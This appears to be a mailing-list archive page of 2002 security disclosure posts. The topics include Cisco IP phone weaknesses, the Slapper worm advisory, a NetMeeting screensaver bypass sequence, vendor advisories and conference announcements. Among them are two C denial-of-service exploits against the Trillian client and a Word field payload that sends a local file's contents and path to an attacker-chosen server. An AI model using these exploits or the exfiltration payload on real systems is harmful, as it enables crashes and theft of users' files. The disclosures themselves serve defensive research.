RE: The Trivial Cisco IP Phones Compromise

2002-09-20 Thread Ofir Arkin

Dear all,

It seems that dispite repeated efforts to educate Cisco about the
dangers of unauthenticated adminstration mechanisms, they continue to
tout their knee-jerk "firewall" response. As I will clearly demonstrate
in my response, a firewall adds no security to a large scale deployment
of Cisco IP Phones.

I am dissapointed that my paper has not been understood by Cisco, but
hope that their customers will understand -- unauthenticated
administration mechanisms are inherently insecure.

>>1.  Access to the Cisco 7960 IP phone:
>>A Cisco model 7960 IP phone running a SIP-compatible image has a 
>>password that can be set by the IP phone administrator.  The default 
>>password is "cisco" if the password has not been set to some other 
>>value.  Cisco strongly recommends setting the password to something 
>>other than the default.

This is certainly a good step, however, the password is stored in plain
text in an easily accessible location (on the TFTP server in
SIPDefault.cnf). Any changed password can be readily retrieved,
highlighting the fundemental problems with the security of the Cisco
SIP-based IP Phone: unauthenticated administration mechanisms.

>>The key sequence of "**#" is not intended as a password.  It is 
>>clearly and publicly documented in many places within Cisco's product 
>>literature.  The key sequence is solely intended to protect against 
>>casual or accidental changes to the phone's configuration.

Something that I acknowledge in my paper. This is simply another example
of how the administrative alterations to the IP Phone's settings can be
made by anyone. "**#" is the local unauthenticated administrative
mechanism, TFTP is the remote unauthenticated administrative mechanism.
Neither provide any level of security at all.

>>2.  Abuse of the TFTP service:
>>Although the author is correct that various attacks against the TFTP 
>>service can be mounted, there are several measures that can be 
>>employed by the IP phone administrator and the organization to 
>>mitigate the risk.

This statement is incorrect. There is nothing that can be done to secure
and protect a service that is fundementally insecure. The below
knee-jerk suggestions, vis. a firewall, provide no security to the TFTP
server; authentication cannot be duct-taped onto TFTP.

>>If the network is firewalled properly so that the different network 
>>segments are compartmentalized as the Cisco SAFE white papers 
>>recommend, then the TFTP server will only respond to legitimate 

This is a clear demonstration of the faulty logic at work with Cisco:
applying band-aid solutions will fix a deeply flawed product. TFTP has
no means of determining legitimate from illegitimate requests (i.e. no
authentication). What Cisco has suggested as a remedy is a cobbling
together of two technologies (VLANs and firewalls) neither of which
address authentication. No amount of third party solutions will provide
a secure means of authenticating TFTP requests. 

There is no means of properly firewalling a TFTP server. Firewalls
prevent access to services or prevent access from certain IPs. TFTP is
being offered as a service, so the only protection that the firewall can
offer is based on IP addresses. Since TFTP uses the connectionless
protocol UDP as a transport layer, TFTP requests can be trivially
spoofed. A firewall can provide no security for TFTP. 

>>The TFTP server does not need
>>to reside on the same network segment as the IP phone.  If RFC 1918 
>>addressing is employed for the IP phones and proper ingress/egress 
>>filtering is in place as recommended, then any such attack is highly 
>>unlikely to succeed from outside the enterprise VoIP network, even 
>>with the use of UDP.

Ingress/egress filtering might go some way towards resolving the
spoofing problem. I would point out however that no spoofing is required
to comprimise the integrity of a Cisco compliant deployment enterprise
VoIP network. There are deeper flaws with the Cisco solution.

>>Access to the
>>physical networks from within the enterprise may make it easier to 
>>succeed with the attack, but if the VLANs are properly protected

Momentarily ignoring the fact that VLANs are networking solutions, not
security solutions, I will explore the problems with Cisco's VLAN

Based on the discussion of firewalling TFTP, we can assume that an
attacker who can penetrate the voice data VLAN can impersonate any
device on that VLAN. Essentially Cisco is suggesting that a legitimate
TFTP request can be determined based on its presence on the voice data
VLAN. Penetrating the VLAN is not a difficult task. There are numerous
documents on this subject 
available on the Web.

Cisco recommends that the IP Phone and a PC (or workstation) share a
port on the switch. VLANs are then used to segment the traffic from
either device. With the VLAN keys an attacker can inject frames into the
voice data VLAN. The VLAN keys a

Re: The Art of Unspoofing

2002-09-20 Thread Sean Trifero

Euan said:
> This is just simplistic, ill conceived rubbish.

Don't tell us what you really think...

> There is absolutely no way to guarantee that you are "tracking down"
> the correct IP or the correct person.

You're right.  I should have put that in the disclaimer, but we thought
that the average person would understand that from the start.

> Is it safe to assume an attacker is going to use the generic public
> smurf.c tool etc, is it safe to assume the attacker is going to use
> traceroute or ping to test if the victim host is alive? Is it safe to
> assume the attacker wont use blind spoofed IP ID techniques or
> some other method to test if the victim host is alive? No.

Is it safe to assume that every attacker has thought out the attack as
much as you just have?  I'm not sure what type of DoS attacks you've seen
impact your network in your days... but from my experience, I can say that
at least one of those assumptions has been present in 95% of the DoS
attacks I have encountered, but that's just lil ol' me.

> Whats to stop an attacker spoofing dns lookups and pings from
> another host in order to incriminate it?

Would your average ./attacker have thought to spoof the dns querys, or
randomize the ttl before we wrote this paper?  Nope, didn't think so...

> What it comes down to is - it is  easy  for a semi-intelligent attacker
> to cause a denial of service attack that is completely untraceable from
> the target side, grasping at straws like this wont do much good atall
> except waste a lot of your time.

What it comes down to is - we realized that when we published this article
that as soon as the information was known, that most if not all the
techniques would be obsolete.  Knowing this put me in a sticky situation
about even disclosing it in the first place.  In the end I decided to
release it anyways, and I knew it's release would get a few well thought
out posts like yours.

Sean Trifero
Security Technologies

SuSE Security Announcement: Slapper worm (SuSE-SA:2002:033)

2002-09-20 Thread Olaf Kirch

In a typical case of Heisenmurphy, the PGP signature of the previous
message got garbled, and I can't figure out why. Here's a re-send of
the message, re-signed.

I apologize for any confusion this may have caused.




SuSE Security Announcement

Package:openssl/Slapper worm
Date:   Thu Sep 19 2002
Affected products:  7.0, 7.1, 7.2, 7.3, 8.0
SuSE Linux Database Server,
SuSE eMail Server III,
SuSE eMail Server 3.1,
SuSE Linux Enterprise Server,
SuSE Linux Firewall on CD,
SuSE Linux Enterprise Server 7
SuSE Linux Office Server
Vulnerability Type: buffer overflow
Severity (1-10):9
SuSE default package:   yes
Cross References:   CVE CAN-2002-0655, CAN-2002-0656,
CAN-2002-0659, SuSE-SA:2002:027

Content of this advisory:
1) vulnerabilities in openssl libraries; Slapper worm
2) pending vulnerabilities, solutions, workarounds
3) standard appendix (further information)


1)  problem description, brief discussion, solution, upgrade information

This advisory is issued in an attempt to clarify any issues
surrounding the recently discovered Apache/mod_ssl worm.

On July 30, we released a security advisory concerning vulnerabilities
in OpenSSL, including a buffer overflow in the SSL code. This
vulnerability (CVE CAN-2002-0656, also discussed in CERT Advisory is currently being
exploited by a worm called Slapper, propagating through Apache's
mod_ssl module.

It is worth noting that even though the worm infects Apache through
mod_ssl, this is not a vulnerability in mod_ssl or Apache, but in
the OpenSSL library used by mod_ssl.

This also means that Apache may not be the only service vulnerable
to an attack via the SSL bug. Similar exploits may be possible
against cyrus-imapd, sendmail with TLS support, or sslwrap-enabled

As a workaround, it is also possible to disable SSLv2 in mod_ssl
(as described in our previous advisory SuSE-SA:2002:027;, but you
should be aware that this does not protect other SSL based servers
that may be running on your machine.

We have received numerous inquiries from SuSE users on whether the
update packages provided by SuSE as part of SA:2002:027 fix this bug
even though they do not contain the latest OpenSSL version recommended
in various advisories.

To clarify this, we would like to state that these packages DO FIX
the bug exploited by the Slapper worm. Following established policy,
we did this by applying a source code patch instead of upgrading to
a newer version, because the latter usually causes serious problems
for many users (in particular, different versions of OpenSSL libraries
are not always API compatible).

However, it turns out that a number of packages were statically
linked against OpenSSL libraries:

mod_ssl (SuSE Linux 7.0):
We have released rebuilt mod_ssl packages linked against the
most recent OpenSSL libraries.

If you run mod_ssl on SuSE Linux 7.0, you must upgrade mod_ssl,

sendmail-tls (SuSE Linux 7.1, 7.2, 7.3):
Sendmail-tls, the SSL enabled version of sendmail, was linked
statically against OpenSSL on SuSE 7.1, 7.2 and 7.3. The security
impact of this problem is probably the same as with Apache and

We are releasing rebuilt packages linked against the most
OpenSSL libraries.

Sendmail-tls is not part of the default installation profile.

If you are using sendmail-tls, we strongly recommend you upgrade
to the latest packages provided on our FTP servers.

openssh (SuSE Linux 7.1, 7.2 and 7.3):
Ssh and sshd do not use any SSL functionality, and thus are not
susceptible to the type of attack carried out by the Slapper worm.

To date, we are not aware of any way to exploit them. We nevertheless
recommend to upgrade to the latest versions provided on our FTP site.

freeswan (SuSE Linux 7.1, 7.2):
FreeSWAN includes a utility named fswcert for creating and
manipulating X.509 certificates, which is also linked statically
against libcrypto.

To date, we are not aware of any way to explo

Re: The Trivial Cisco IP Phones Compromise

2002-09-20 Thread Peter Peters

On Thu, 19 Sep 2002 16:32:43 -0400, you wrote:

>1.  Access to the Cisco 7960 IP phone:
>A Cisco model 7960 IP phone running a SIP-compatible image has a
>password that can be set by the IP phone administrator.  The default
>password is "cisco" if the password has not been set to some other
>value.  Cisco strongly recommends setting the password to something
>other than the default.

There have been discussion going on (and off) about the danger of
default passwords. How long does it take before so-called secure aware
companies become really aware of security issues?

>The key sequence of "**#" is not intended as a password.  It is
>clearly and publicly documented in many places within Cisco's
>product literature.  The key sequence is solely intended to protect
>against casual or accidental changes to the phone's configuration.

Then just don't accept is as a password. It's that simple, isn't it?

>2.  Abuse of the TFTP service:
>Although the author is correct that various attacks against the TFTP
>service can be mounted, there are several measures that can be
>employed by the IP phone administrator and the organization to
>mitigate the risk. 
>If the network is firewalled properly so that the different network
>segments are compartmentalized as the Cisco SAFE white papers
>recommend, then the TFTP server will only respond to legitimate
>requests.  The TFTP server does not need to reside on the same
>network segment as the IP phone.  If RFC 1918 addressing is employed
>for the IP phones and proper ingress/egress filtering is in place as
>recommended, then any such attack is highly unlikely to succeed from
>outside the enterprise VoIP network, even with the use of UDP.
>Access to the physical networks from within the enterprise may make
>it easier to succeed with the attack, but if the VLANs are properly
>protected and MAC addresses monitored per the SAFE documents -- for
>example, by using arpwatch or arpsnmp -- then an attack may be
>detected by the IP phone administrators. 

Not in all situations the IP phones are within one network. Sometimes
the phones are used by home workers. And not all ADSL- and
cable-companies allow IPsec over their network. At least not when you
have a consumer version of the connection. If you want IPsec you have to
buy the expensive business version for all the home workers.

Re: NetMeeting 3.01 Local RDS Session Hijacking

2002-09-20 Thread proberts


To clarify the initial post and different key sequences:

When the NetMeeting password protected screensaver is bypassed and control 
of the local system is taken, the local session hijacker gains the rights 
of the local logged in user.  In most cases this is administrator as 
administrator rights are required to connect to a remote desktop session 
and a remote user often uses the same account locally.  Additionally, any 
extra rights or remote administration connections currently associated 
with the local session such as NetWare connections or other client 
connections to applications such as IDS management systems would be 
transferred to the local console hijacker.  The initial post stated that 
rights of the 'remote user' would be gained and that may have been an 
unclear statement.

Note that in some cases the last couple steps might seem unecessary as 
control appears to be transferred to the local console.  The steps are 
usually required to prevent an error appearing when launching a program 
indicating that the system is shutting down or to prevent the password 
protected screensaver from invoking itself.  Also, too long a delay in the 
steps may allow the screensaver to lock the session.

Keys by OS:
(These steps will assume that an application has altered or new data such 
as text added to an unsaved notepad window for simplicity.)

Windows XP Professional
(2) Shutdown
(3) OK
(4) ESC
(5) Wait for the "End Program" dialog box to appear
(6) Select Cancel
(7) Cancel the save of changed data

Windows 2000 Professional Spk3
(2) Log Off
(3) Yes
(4) ESC
(5) Wait for the "End Program" dialog box to appear
(6) Select Cancel
(7) Cancel the save of changed data
(9) ESC

Windows NT 4.0 Spk6a
(2) Logout
(3) OK
(4) ESC
(6) Select Cancel
(7) Cancel the save of changed data
(9) ESC

ShadowCon 2002

2002-09-20 Thread Sharla Warren

Sharpen your information assurance awareness and skills and knowledge at
NSWC Dahlgren's ShadowCon 2002.

Thursday, October 17, 2002
NSWC Dahlgren, VA

This annual conference and exposition is developed by the Information
Systems Security Office at NSWC Dahlgren to provide informative
presentations and access to information assurance exhibitors.  Each year we
coordinate an impressive list of highly skilled experts in the field of
information assurance.  The program is developed by the government and it is
offered at no charge to all IT managers & personnel who are U.S. citizens
and wish to broaden their horizons regarding the latest information
assurance issues and solutions.

Conference Topics will Include:
  a.. Network Security Monitoring
  b.. Securing Wireless Technology
  c.. Fighting Cybercrime Before it Happens
  d.. Risk Assessment
KEYNOTE:  Alan Paller, Director of Research, SANS Institute

Additional presenters from Virginia Tech, SAIC, and Integrated Data Systems

EXPOSITION:  30 Vendors will exhibit their solutions in an interactive

Naval Surface Warfare Center Dahlgren
JD's Training Center - Building 216
Dahlgren, VA 22448-5100

DATE:  Thursday, October 17, 2002
TIME:  9:00 - 3:00
COST:  No charge to attend


Note:  We only have 200 seats available so act quickly to confirm your space
and avoid the waitlist.

If you have any questions please call Sharla Warren at 703-536-5372.

Yet Another. Trillian 'JOIN' Overflow.

2002-09-20 Thread Lance Fitz-Herbert

02 September 2002 By Me, Lance Fitz-Herbert (aka phrizer).

Vulnerable Applications:

Tested On Trillian .73 and .74, But im guessing older versions are also 
vulnerable, and possibly version 1.0 Pro.

Low-High. This could possibly allow arbitary code to be executed on the 
remote victims machine, or used as a DoS.


Trillian is a popular Instant Messageing client, which supports 
icq/aim/yahoo/msn and IRC.
An overflow exists in the way Trillian procceses 'JOIN' commands from the 
irc server. If Trillian joins a channel that is larger than 206 bytes, 
trillian will crash and overwrite registers.

To exploit this, the victim needs to be connected to the attackers 'IRC 

Dont go on untrusted IRC Server :P

Exploit Code:
Prove of flaw, DoS Code:

/* Trillian-Join.c
   Author: Lance Fitz-Herbert
   Contact: IRC: Phrizer, DALnet - #KORP
ICQ: 23549284

   Exploits the Trillian Join Flaw.
   Tested On Version .74 and .73
   Compiles with Borland 5.5 Commandline Tools.

   This Example Will Just DoS The Trillian Client,
   not particularly useful, just proves the flaw exists.




#define MSG1 ":server 001 target :target\n:target!ident@address JOIN :"

int main() {

int nRet;
char payload[300];

printf("\nTrillian Join Flaw\n");
printf("Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\n");
printf("Tested On Version .74 and .73\nListening On Port 6667 For 

if (WSAStartup(MAKEWORD(1, 1), &WsaDat) != 0) {
printf("ERROR: WSA Initialization failed.");
return 0;

/* Create Socket */
if (s == INVALID_SOCKET) {
printf("ERROR: Could Not Create Socket. Exiting\n");
return 0;

Sockaddr.sin_port = htons(6667);
Sockaddr.sin_family = AF_INET;
Sockaddr.sin_addr.s_addr  = INADDR_ANY;

nRet = bind(s, (LPSOCKADDR)&Sockaddr, sizeof(struct sockaddr));
if (nRet == SOCKET_ERROR) {
printf("ERROR Binding Socket");
return 0;

/* Make Socket Listen */
if (listen(s, 10) == SOCKET_ERROR) {
printf("ERROR: Couldnt Make Listening Socket\n");
return 0;

while (TempSock == SOCKET_ERROR) {
  TempSock = accept(s, NULL, NULL);

printf("Client Connected, Sending Payload\n");


return 0;

--end code--

NOTE: Because of the amount of spam i receive, i require all emails directed 
*to me* to contain the word "nospam" in the subject line somewhere. Else i 
might not get your email. thankyou.

MSN Photos is the easiest way to share and print your photos:

Re: Microsoft Windows Terminal Services vulnerabilities

2002-09-20 Thread Ben Cohen

On Wed, 18 Sep 2002, Ben Cohen wrote:

> I have just installed Windows XP Pro SP1 and found that the two
> vulnerabilities announced earlier in the week have been addressed.  

Microsoft has now posted a security bulletin and standalone patch here:

> "Microsoft Windows XP Remote Desktop denial of service" is fixed.
> "Microsoft Windows Remote Desktop Protocol checksum and keystroke" is
> partially fixed:
> ...

ANNOUNCE: Egads 0.9.5

2002-09-20 Thread EGADS Team

Secure Software Inc. would like to announce the release of EGADS 0.9.5.
EGADS is a system service and library for providing secure random numbers.
It contains an implementation of the Tiny pseudo-random number generator
and the Tiny entropy gateway. Tiny is an evolution of Yarrow, and was
designed by John Kelsey (an original designer of Yarrow) and John Viega.

EGADS provides the same kind of functionality as /dev/random and /dev/urandom
on Linux systems, but works on Windows, and as a portable Unix program.

EGADS is available as a portable user-level daemon for Unix systems, and as
a service for Windows 2000/XP machines.

New in this version of EGADS:

Support for an EGD-like interface

Entropy API for getting raw entropy from the EGADS daemon

Various PRNG bugfixes.

To download EGADS, please visit

Re: Trillian .74 and below, ident flaw.

2002-09-20 Thread netmask {enZo}

> Lance Fitz-Herbert ([EMAIL PROTECTED]) composed on Sep 18, 2002:

Hello Lance, out of bordem I wrote one that compiles on un*x

trillident.c is attached

netmask @ enZo

/* Trillian .74, .73 remote DoS..  Trillian Pro 1.0

 *Exploits buffer overflow in ident when sending over
 *418 bytes. 
 *Really only works if people are on IRC (otherwise, the ident
 *daemon shuts down..  And you've got to know they are running
 *Trillian, obviously.
 *bug discovered by Lance Fitz-Herbert (aka phrizer) on 03 September 2002
 * Compile With:
 * Linux: gcc -o trillident trillident.c
 * Solaris: gcc -o trillident trillident.c -lsocket -lnsl
 * Windows: Use someone elses code.

    Z:Z   ooo
  n:::nnnn  Z:::ZZZ::Z  oo:::oo
 eee  n::nn Z  * Z::Z  o:::o
   ee:::eenn:::n  2 Z:Zo:::o
  e:::een::n 0 Z:Z oo  o::oo
 e::e::ennnn0 Z:Z  oo o::ooo
 e:e e:ennnn   2 Z:Z   ooo::o oo
 e::e::ennnn  * Z:Zoo::o  oo
 ee nnnn   Z:Z o:::o
 e:eee  nnnnZZZ:Z Zo:::o
 e::e   nnnnZ:::::Z oo:::oo
 e:::e  nnnnZ:Z   ooo
ee:e \... .../

(The above is radical ascii art.. Respect it. The below is a lame DoS. )


#define ERR -1

void usage(char* argv0);
int dostrill(char *ip, int port);

int main(int argc, char *argv[])

extern int optopt;
extern char *optarg;
int errorflag = 0; /* did someone screw up? */
int port = 113; /* default port to use unless -p */
int c;

if ((argc < 2) || (argc > 6))

while ((c=getopt(argc, argv, "vp:")) != EOF) {
switch(c) {
case 'p':
fprintf(stderr, "Using port %s\n", optarg);
port = strtol(optarg, NULL, 10);
case 'v':
fprintf(stderr, "Trillian Ident DoS - [Sep 19, 2002]\n");
fprintf(stderr, "written by: netmask@enZo\n\n");
case ':':
fprintf(stderr, "Option -%c requires an operand\n", optopt);
case '?':
fprintf(stderr, "Unrecognized option: -%c\n", optopt);


if (errorflag) {

/* kill them */

dostrill(argv[argc-1], port);
fprintf(stderr, "Finished!\n");
return 0;
} /* end main */

void usage(char* argv0)
fprintf(stderr, "Trillian Ident DoS - [Sep 19, 2002]\n");
fprintf(stderr, "Written by: netmask@enZo\n\n");
fprintf(stderr, "Usage: %s [options] IP\n\n", argv0);
"-p \tPort to use\n"
"-v \tPrint the program info\n");

int dostrill(char *ip, int port)
int s, r;
char buf[420]; /* buffer to send */

struct sockaddr_in addr;
struct hostent *hp;
memset((char *) &addr, '\0', sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = inet_addr(ip);
addr.sin_port = htons(port);
memset(buf, 'A', 420);

if ((hp = gethostbyname(ip)) != NULL) {
if (hp->h_length > sizeof(addr.sin_addr)) {
hp->h_length = sizeof(addr.sin_addr); }
memcpy((char *) &addr.sin_addr, hp->h_addr, hp->h_length);
else {
if ((addr.sin_addr.s_addr = inet_addr(ip)) < 0) {


if (s == ERR) {
fprintf(stderr, "Couldn't Create Socket\n");
return 1;


2002-09-20 Thread RATS Team

Secure Software Inc. would like to announce the release of RATS 2.0.

RATS, the Rough Auditing Tool for Security, is a security auditing utility
for C, C++, Python, Perl and PHP code. RATS scans source code, finding
potentially dangerous function calls. The goal of this project is not
to definitively find bugs. The current goal is to provide a reasonable
starting point for performing manual security audits. RATS is released
under version 2 of the GNU Public License (GPL).

New in this version of RATS:

RATS can now descend through directories recursively, analyzing any supported
source code it finds.

Ability to output results as HTML or XML.

Result output can contain the line of code that caused each problem to be
reported, along with the column number in the source file the problem was
detected at.

RATS will now report various statistics at the end of the reporting phase,
including total time spend on the analysis, and number of source lines analyzed.

Various database additions.

A new database file, rats-openssl, which aids in analyzing any code that
utilizes the OpenSSL C API. (Thanks to Ben Laurie for contributing this

To download RATS, please visit

[CLA-2002:525] Conectiva Linux Security Announcement - kdelibs

2002-09-20 Thread secure

Hash: SHA1

- --
- --

PACKAGE   : kdelibs
SUMMARY   : Cross site scripting vulnerability
DATE  : 2002-09-20 12:10:00
ID: CLA-2002:525

- -

 KDE[1] is a very popular graphical desktop environment available for
 GNU/Linux and other operating systems. 
 A cross site scripting vulnerability[2] has been found in the
 Konqueror browser which also affects other programs that use the same
 rendering engine (KHTML).
 This vulnerability could allow an attacker to steal cookies and
 perform other types of cross site scripting attacks on applications
 which use the KHTML rendering engine, such as Konqueror.
 The KDE team released an advisory[3] and patches to address this

 All KDE users, or users of KDE applications which use the KHTML
 rendering engine, should upgrade their packages.
 Please note that is necessary to restart KDE (or its applications if
 another desktop is being used) to close this vulnerability.


 Users of Conectiva Linux version 6.0 or higher may use apt to perform 
 upgrades of RPM packages:
 - add the following line to /etc/apt/sources.list if it is not there yet
   (you may also use linuxconf to do this):

 rpm [cncbr] 6.0/conectiva updates

(replace 6.0 with the correct version number if you are not running CL6.0)

 - run: apt-get update
 - after that, execute: apt-get upgrade

 Detailed instructions reagarding the use of apt and upgrade examples 
 can be found at

- -
All packages are signed with Conectiva's GPG key. The key and instructions
on how to import it can be found at
Instructions on how to check the signatures of the RPM packages can be
found at
- -
All our advisories and generic update instructions can be viewed at

- -
subscribe: [EMAIL PROTECTED]
unsubscribe: [EMAIL PROTECTED]
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see


Re: The Trivial Cisco IP Phones Compromise

2002-09-20 Thread Jim Duncan


Ofir Arkin writes:
> The referred paper lists several severe vulnerabilities with Cisco
> systems' SIP-based IP Phone 7960 and its supporting environment. These
> vulnerabilities lead to: complete control of a user's credentials; total
> subversion of a user's settings for the IP Telephony network, and the
> ability to subvert the entire IP Telephony environment. Malicious access
> to a user's credentials could enable "Call Hijacking", "Registration
> Hijacking", "Call Tracking", and other voice related attacks. The
> vulnerabilities exist with any deployment scenario, but this paper deals
> specifically with large scale deployments as recommended by Cisco.
> A PDF version of the paper is available from:

This message contains Cisco responses to the issues described in the
white paper referenced above.

1.  Access to the Cisco 7960 IP phone:

A Cisco model 7960 IP phone running a SIP-compatible image has a
password that can be set by the IP phone administrator.  The default
password is "cisco" if the password has not been set to some other
value.  Cisco strongly recommends setting the password to something
other than the default.

The key sequence of "**#" is not intended as a password.  It is
clearly and publicly documented in many places within Cisco's
product literature.  The key sequence is solely intended to protect
against casual or accidental changes to the phone's configuration.

2.  Abuse of the TFTP service:

Although the author is correct that various attacks against the TFTP
service can be mounted, there are several measures that can be
employed by the IP phone administrator and the organization to
mitigate the risk. 

If the network is firewalled properly so that the different network
segments are compartmentalized as the Cisco SAFE white papers
recommend, then the TFTP server will only respond to legitimate
requests.  The TFTP server does not need to reside on the same
network segment as the IP phone.  If RFC 1918 addressing is employed
for the IP phones and proper ingress/egress filtering is in place as
recommended, then any such attack is highly unlikely to succeed from
outside the enterprise VoIP network, even with the use of UDP.
Access to the physical networks from within the enterprise may make
it easier to succeed with the attack, but if the VLANs are properly
protected and MAC addresses monitored per the SAFE documents -- for
example, by using arpwatch or arpsnmp -- then an attack may be
detected by the IP phone administrators. 

3.  Manual modification of the IP phone configuration:

At some level, successful attacks would require such physical access
to the local network segment or the IP phone that the attacker could
simply use the IP phone itself to commit toll fraud and some of the
other improper acts listed in the paper.  Physical access to network
hardware is a long-standing, well-known problem in the industry.
This is an especially important consideration for IP phones located
in public or semi-public areas such as building lobbies.  The IP
phone admistrator should use all available mechanisms to secure any
IP phones that are exposed to unauthorized manipulation.

As always, Cisco is interested in protecting our customers' networks and
is continually striving to improve the security of our products.  We
appreciate the seventeen days of advance notice we received from the
author and his willingness to discuss the issue with us.  We are unaware
of any confirmed incidents of malicious exploitation of the issues in
the author's paper and ask that any such exploitation be reported to the
Cisco PSIRT, [EMAIL PROTECTED],  as soon as possible.

Jim Duncan, Product Security Incident Manager, Cisco Systems, Inc.
E-mail: [EMAIL PROTECTED]  Phone(Direct/FAX): +1 919 392 6209

Version: PGP 6.5.2


Jim Duncan, Product Security Incident Manager, Cisco Systems, Inc.
E-mail: [EMAIL PROTECTED]  Phone(Direct/FAX): +1 919 392 6209


2002-09-20 Thread Dragos Ruiu

CALL FOR PAPERS: CanSecWest/core03

The fourth annual CanSecWest computer security training
conference is scheduled to be held April 16-18 2003 in 
Vancouver, British Columbia, Canada.

Submissions and presentation proposals for tutorials 
for this conference will be accepted during the months 
of September and October 2002, with preference given 
to submissions made in September.

The CanSecWest conferences consist of tutorials on 
advanced technical details about current issues, innovative 
techniques and best practices in the information security 
realm. The audiences are a multi-national mix of professionals
involved on a daily basis with security work: security product 
vendors, programmers, security officers, and network 
administrators. We give preference to technical details 
and education for a technical audience.

The conference itself is a single track series of presentations
in a lecture theater environment.  The presentations offer
speakers the opportunity to showcase on-going research
and collaborate with peers while educating and highlighting
advancements in security products and techniques. 
The focus is on innovation, tutorials, and education
instead of overt product pitches. Some commercial content 
is tolerated, but it needs to be backed up by a technical 
presenter - either giving a valuable tutorial and best 
practices instruction or detailing significant new 
technology in the products. 

Paper proposals should consist of the following information:

1) Presenter, and geographical location (country of origin/passport)
   and contact info (e-mail, postal address, phone, fax).
2) Employer and/or affiliations.
3) Brief biography, list of publications and papers.
4) Any significant presentation and educational experience/background.
5) Topic synopsis, Proposed paper title, and a one paragraph description.
6) Reason why this material is innovative or significant.
7) Optionally, any samples of prepared material or outlines ready. 
8) Optionally, list any software, source code or new information
   scheduled to be released and available for publicaiton on the
   conference CD.

Please forward the above information to [EMAIL PROTECTED] to
be considered for placement on the speaker roster.

Details of presentation logistics:

Presenters do not have to submit full text of their materials,
but do have to submit slides and any accompanying software/demo 
information at the deadline one month before the conference. 
Presentations are nominally one hour in length, and exceptions
must be justified. (And this year this will be a very strict 
limit, and we will try to have few or no exceptions.) Internet
access (wireless or other) and av projection is provided for
live demonstrations.

Vendor display or corporate sponsorship inquiries and 
requests for attendee or exhibitor information should be 
directed to [EMAIL PROTECTED] The conference 
site and registration system is at:

--dr  pgpkey:
0 = 1 , for large values of zero and small values of one.

More vulnerabilities (Re: Security side-effects of Word fields)

2002-09-20 Thread Alex Gantman


A lot of people have been complaining about the fact that Alice must coerce Bob into 
editing and returning the bugged document.  In this feature-driven market the cries of 
the users have not fallen on deaf ears.  There appears to be a way for Alice to steal 
files from Bob (and a few other things) and all Bob has to do is open the Word 
document that Alice has sent to him.  He no longer needs to bother with editing, or 
printing, or sending the document back to Alice.

Richard Edwards brought up the fact that the {INCLUDEPICTURE} field, unlike the 
{INCLUDETEXT} field, accepts URLs and not just local file names.  So, if Alice can get 
the {INCLUDEPICTURE} field to update automatically every time the document is opened 
(by using the \d switch, for example) it will trigger a message to be sent to a server 
of her choice.  So, what can Alice do with it?  She could, for example, get the 
absolute path of where Bob has saved the document as well as the contents of some 
other file on Bob's computer:

{ INCLUDEPICTURE { QUOTE "http:\\\" & { FILENAME \p } & { 
INCLUDETEXT "c:\\a.txt" } } \d }

She could also keep track of who is reading (or printing) the file she sent to Bob:

} } \d }

There are some limitations to what Alice can do with this.  Word limits the HTTP URLs 
to 256 characters ( I don't know what the limit for other URLs is).   Also, the 
{USERNAME} and {USERADDRESS} fields do not update automatically when a document is 
opened on all versions of Word (but they do when the document is printed).

The proof-of-concept code above is just pseudocode.  It does not include all the 
triggers necessary for the fields to update automatically.  I am sure that the reader 
can easily combine this with my previous post to get things right.  Testing out this 
vulnerability is a little more difficult for individual users because it requires 
access to a web server.  So, if anyone out there wants to contribute a web site that 
simply displays its own logs, I will contribute a Word file with a fully functioning 
demonstration of the exploit that people can use to test this vulnerability.

I really don't have any time to spend on this at work, and I have already taken enough 
time from my wife and kid for this.  So, I am dropping this as it stands now.  For 
those interested in pursuing these issues further I have put together some exercises 
for the reader:
1) Other exploits of fields
   a) {INCLUDEPICTURE} accepts many different types of URLs.  I've only tested HTTP 
(and mailto to some extent).  What happens when you use FTP, telnet, file, etc?
   b) It appears that the {INCLUDEPICTURE} field creates only a one-way channel from 
the victim to the attacker.  Is it possible that some of the URLs will allow a 2-way 
channel?  If the field can ever evaluate to a text response (as opposed to the 
picture), the response can be used as input to another field.
   c) Are there other ways of triggering the automatic updating of fields?
   d) How far can you go with fields?  Alice can set ({SET}) and get ({REF}) 
variables, branch ({IF}), perform basic math ({=}), get user information ({USERNAME}, 
{USERADDRESS}), read files ({INCLUDETEXT}, {INCLUDEPICTURE}), send messages over the 
network ({INCLUDEPICTURE}), and send commands to the printer ({PRINT}).
2) Are there other applications with similar vulnerabilities.
3) Has anyone seen an example of these exploits out in the wild (from before the 
original post to bugtraq)? 

Microsoft was notified on 9/17/2002.

>From: Alex Gantman <[EMAIL PROTECTED]>
>Subject: Security side-effects of Word fields